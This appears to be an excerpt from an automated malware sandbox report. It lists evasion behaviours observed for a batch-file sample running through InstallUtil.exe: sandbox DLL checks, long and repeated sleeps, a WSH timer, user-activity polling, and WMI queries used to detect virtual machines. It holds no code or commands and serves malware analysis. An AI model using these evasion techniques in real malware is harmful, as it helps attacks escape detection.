Binary or memory string: SBIEDLL.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Memory allocated: 2800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Memory allocated: 2800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 27F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Memory allocated: 4B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Memory allocated: 4E70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: AE0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2710000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: D20000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799964
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799610

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Window / User API: threadDelayed 2652	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Window / User API: threadDelayed 2293	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 6631	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3204	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Window / User API: threadDelayed 4361	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Window / User API: threadDelayed 1359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3024
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 6803

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe TID: 4508	Thread sleep count: 2652 > 30	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe TID: 6212	Thread sleep count: 2293 > 30	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe TID: 5588	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1456	Thread sleep count: 6631 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1456	Thread sleep count: 3204 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -99778s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -99670s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -99107s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -98995s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -98875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -98766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -98654s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -98541s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -98379s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -98206s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -98090s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97970s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97733s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97609s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97390s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97280s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97171s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96938s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96719s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96594s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96266s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -95937s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -95827s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -95715s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -95328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -95125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -95015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94141s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -93922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -93797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -93687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -93578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe TID: 4232	Thread sleep count: 4361 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe TID: 4232	Thread sleep count: 1359 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe TID: 5016	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6784	Thread sleep count: 3024 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -99874s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -99764s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6784	Thread sleep count: 6803 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -99611s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -99484s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -99375s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -99265s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -99156s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -99047s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98937s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98827s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98609s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98500s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98390s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98280s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98169s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98062s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97953s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97844s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97609s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97500s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97383s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97265s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97156s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97045s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96937s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96828s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96718s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96608s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96492s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96389s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96281s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96171s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96062s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95953s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95825s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95605s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95484s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95375s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95265s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95155s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95047s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -94937s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -94819s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -1799964s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -1799860s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -1799735s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -1799610s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99778	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99670	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99107	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98995	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98654	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98541	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98379	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98206	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98090	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97970	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97733	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97280	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95827	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95715	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 93922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 93797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 93687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 93578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99874
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99611
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99047
